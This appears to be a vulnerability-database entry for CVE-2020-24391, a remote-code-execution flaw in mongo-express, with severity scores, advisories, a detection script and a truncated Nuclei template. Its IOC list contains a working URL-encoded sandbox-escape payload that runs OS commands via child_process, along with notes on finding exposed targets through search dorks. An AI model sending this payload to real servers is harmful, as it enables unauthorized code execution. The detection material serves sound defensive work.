CVE-2020-24391
Published: 2021-03-30

CVE-2020-24391: mongo-express before 1.0.0 offers support for certain advanced syntax but implements this in an unsafe way. NOTE: this may overlap CVE-2019-10769.
Priority: P271 · Critical 9.8 (CVSS 3.1)
Vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
Exploit: available
EPSS: 75.09% (99.4th percentile)
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mongo-express_project | mongo-express | <= 0.54.0 | — |
Detection & IOCs (extracted from sources)

- url: `/checkValid`
- path: `/public/css/{{randstr}}.css`
- command: `document=++++++++++++%28%28%29+%3D%3E+%7B%0A++++++++const+process+%3D+clearImmediate.constructor%28%22return+process%3B%22%29%28%29%3B%0A++++++++const+result+%3D+process.mainModule.require%28%22child_process%22%29.execSync%28%22id+%3E+build%2Fcss%2F{{randstr}}.css%22%29%3B%0A++++++++console.log%28%22Result%3A+%22+%2B+result%29%3B%0A++++++++return+true%3B%0A++++%7D%29%28%29++++++++`
- yara: `((u|g)id|groups)=[0-9]{1,4}\([a-z0-9]+\)`

- Exploit sends a POST request to /checkValid with a URL-encoded JavaScript payload in the `document` parameter that uses `clearImmediate.constructor` to escape the safer-eval sandbox and execute arbitrary OS commands via `child_process.execSync`.
- After exploitation, the attacker retrieves command output by fetching a CSS file written to the public directory; a successful RCE response body will match the regex `((u|g)id|groups)=[0-9]{1,4}\([a-z0-9]+\)` with HTTP 200.
- Shodan, FOFA, and Google dorks can be used to identify exposed Mongo-Express instances as attack targets.
- The Content-Type `application/x-www-form-urlencoded` is used to deliver the sandbox-escape payload to the /checkValid endpoint; monitor for large or unusual `document` parameter values on this endpoint.
- The vulnerability affects mongo-express versions before 1.0.0 only; instances running 1.0.0 or later are not affected.
- This CVE may overlap with CVE-2019-10769, so deduplication of alerts may be necessary in environments tracking both.
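The monitoring advice above (watch `/checkValid` for oversized or unusual `document` values, and watch for id(1)-style output in files served from the public CSS directory) can be turned into a small log scanner. The code below is an added example, not part of this record, the Nuclei template, or the mongo-express project; the log record layout, the field names and the size threshold are assumptions made for the example, and the sample records are constructed.

```python
"""
Added example (not from the page or from mongo-express): flag POST /checkValid
requests whose URL-encoded `document` parameter is unusually large or carries
sandbox-escape indicators, and confirm exploitation by matching fetched CSS
responses against the regex quoted on the page. Log layout is an assumption.
"""
import re
from urllib.parse import parse_qs

# Regex quoted on the page: id(1)-style output left in the fetched CSS file.
RCE_OUTPUT_RE = re.compile(r"((u|g)id|groups)=[0-9]{1,4}\([a-z0-9]+\)")

# Tokens that have no place in a query submitted for validation; the first two
# come from the exploit description on the page.
ESCAPE_INDICATORS = (
    "clearImmediate.constructor",  # reaching the Function constructor to leave the sandbox
    "child_process",               # module used to run OS commands
    "process.mainModule",
)

# Assumed threshold: a validation request far larger than any real query is suspicious.
MAX_DOCUMENT_LEN = 512


def inspect_request(method, path, body):
    """Return the reasons this request looks like a CVE-2020-24391 attempt ([] if clean)."""
    reasons = []
    if method != "POST" or path.split("?", 1)[0] != "/checkValid":
        return reasons
    # parse_qs decodes the application/x-www-form-urlencoded body ('+' becomes a space)
    document = parse_qs(body).get("document", [""])[0]
    if len(document) > MAX_DOCUMENT_LEN:
        reasons.append(f"document parameter is {len(document)} bytes (limit {MAX_DOCUMENT_LEN})")
    for token in ESCAPE_INDICATORS:
        if token in document:
            reasons.append(f"document contains sandbox-escape indicator {token!r}")
    return reasons


def response_shows_rce(path, status, body):
    """True if a file under /public/css/ was served with HTTP 200 and id(1)-style content."""
    return status == 200 and path.startswith("/public/css/") and RCE_OUTPUT_RE.search(body) is not None


# Constructed sample records, not real traffic: (method, path, status, body)
SAMPLE_LOG = [
    # benign validation of {"name": "alice"}
    ("POST", "/checkValid", 200, "document=%7B%22name%22%3A+%22alice%22%7D"),
    # constructed suspicious request: (() => { const p = clearImmediate.constructor; return p; })()
    ("POST", "/checkValid", 200,
     "document=%28%28%29+%3D%3E+%7B+const+p+%3D+clearImmediate.constructor%3B+return+p%3B+%7D%29%28%29"),
    # constructed evidence of a successful command run written into the public CSS directory
    ("GET", "/public/css/abcd1234.css", 200, "uid=1000(node) gid=1000(node) groups=1000(node)\n"),
    # ordinary stylesheet fetch
    ("GET", "/public/css/style.css", 200, "body { margin: 0; }"),
]


def scan_log(records):
    """Return (request alerts, paths whose response confirms RCE) for a list of records."""
    request_alerts = []
    rce_hits = []
    for method, path, status, body in records:
        reasons = inspect_request(method, path, body)
        if reasons:
            request_alerts.append((path, reasons))
        if method == "GET" and response_shows_rce(path, status, body):
            rce_hits.append(path)
    return request_alerts, rce_hits


if __name__ == "__main__":
    alerts, hits = scan_log(SAMPLE_LOG)
    for path, reasons in alerts:
        print("ALERT", path, "; ".join(reasons))
    for path in hits:
        print("RCE output observed in", path)
```

The request check is the early signal (the payload must pass through `/checkValid` before anything runs), while the response check on `/public/css/` is the confirmation that a command actually executed; the two together separate probing from successful compromise. The indicator list is deliberately short and keyed to what the page describes; a production rule would add the project's other sandbox-escape spellings as they are documented.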
CVSS provenance

| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| NVD | 3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| NVD | 2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |
| GHSA | | 9.8 | CRITICAL | |
| OSV | | 9.8 | CRITICAL | |
OSV: Remote code execution in mongo-express (osv · 2021-04-13 · CVSS 9.8 · CRITICAL · CVE-2020-24391)
Description: same as the CVE summary above.
GHSA: Remote code execution in mongo-express (ghsa · 2021-04-13 · CVSS 9.8 · CRITICAL · CWE-20 · CVE-2020-24391)
Description: same as the CVE summary above.
No detection rules found.
Nuclei: Mongo-Express - Remote Code Execution (nuclei · CVSS 9.8 · CRITICAL · CVE-2020-24391)
Mongo-Express before 1.0.0 is susceptible to remote code execution because it uses safer-eval to validate user supplied javascript. Unfortunately safer-eval sandboxing capabilities are easily bypassed leading to remote code execution in the context of the node server.

Template:
```yaml
id: CVE-2020-24391

info:
  name: Mongo-Express - Remote Code Execution
  author: leovalcante
  severity: critical
  description: Mongo-Express before 1.0.0 is susceptible to remote code execution because it uses safer-eval to validate user supplied javascript. Unfortunately safer-eval sandboxing capabilities are easily bypassed leading to remote code execution in the context of the node server.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execut
```
No writeups or analysis indexed.